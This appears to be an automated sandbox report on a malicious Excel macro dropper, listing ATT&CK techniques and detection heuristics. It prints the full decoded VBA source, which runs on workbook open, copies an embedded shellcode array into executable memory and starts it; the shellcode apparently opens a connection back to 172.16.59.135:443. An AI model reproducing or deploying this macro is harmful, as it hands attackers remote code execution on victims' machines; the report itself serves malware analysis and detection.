MALICIOUS
124
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The critical ClamAV heuristic identifies this file as Doc.Dropper.Valyria-6680543-0, indicating it's a known dropper. The presence of VBA macros, specifically an Auto_Open subroutine, strongly suggests the intent to automatically execute malicious code upon opening. The script utilizes VirtualAlloc and CreateThread, common functions for allocating memory and executing shellcode, likely to download and run a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Valyria-6680543-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6680543-0
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() Dim Vnrpoyjbc As Long, Awxwkv As Variant, Fvqjwv As Long
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4280 bytes |
SHA-256: 65f63539a84849bb8c4324db4246d6ea7f598ba24eeb7cf18cc1d30b485674bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ypigb As Long, ByVal Ildfncnma As Long, ByVal Oul As LongPtr, Avbkszm As Long, ByVal Muccjclya As Long, Gcxob As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kxtlddtb As Long, ByVal Gauxz As Long, ByVal Vfcou As Long, ByVal Anxl As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Giecd As LongPtr, ByRef Mzaaq As Any, ByVal Fens As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Ypigb As Long, ByVal Ildfncnma As Long, ByVal Oul As Long, Avbkszm As Long, ByVal Muccjclya As Long, Gcxob As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kxtlddtb As Long, ByVal Gauxz As Long, ByVal Vfcou As Long, ByVal Anxl As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Giecd As Long, ByRef Mzaaq As Any, ByVal Fens As Long) As Long
#End If
Sub Auto_Open()
Dim Vnrpoyjbc As Long, Awxwkv As Variant, Fvqjwv As Long
#If VBA7 Then
Dim Nzvlflszw As LongPtr, Apoxl As LongPtr
#Else
Dim Nzvlflszw As Long, Apoxl As Long
#End If
Awxwkv = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 51, 50, 0, 0, 104, 119, 115, 50, 95, 84, 104, 76, 119, 38, 7, 255, 213, 184, 144, 1, 0, 0, 41, _
196, 84, 80, 104, 41, 128, 107, 0, 255, 213, 106, 5, 104, 172, 16, 59, 135, 104, 2, 0, 1, 187, 137, 230, 80, 80, 80, 80, 64, 80, 64, 80, 104, 234, 15, 223, 224, 255, 213, 151, 106, 16, 86, 87, 104, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 255, 78, 8, 117, 236, 232, 97, 0, 0, 0, 106, 0, 106, 4, 86, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, _
0, 126, 54, 139, 54, 106, 64, 104, 0, 16, 0, 0, 86, 106, 0, 104, 88, 164, 83, 229, 255, 213, 147, 83, 106, 0, 86, 83, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 34, 88, 104, 0, 64, 0, 0, 106, 0, 80, 104, 11, 47, 15, 48, 255, 213, 87, 104, 117, 110, 77, 97, 255, 213, 94, 94, 255, 12, 36, 233, 113, 255, 255, 255, 1, 195, 41, 198, 117, _
199, 195, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)
Nzvlflszw = VirtualAlloc(0, UBound(Awxwkv), &H1000, &H40)
For Fvqjwv = LBound(Awxwkv) To UBound(Awxwkv)
Vnrpoyjbc = Awxwkv(Fvqjwv)
Apoxl = RtlMoveMemory(Nzvlflszw + Fvqjwv, Vnrpoyjbc, 1)
Next Fvqjwv
Apoxl = CreateThread(0, 0, Nzvlflszw, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.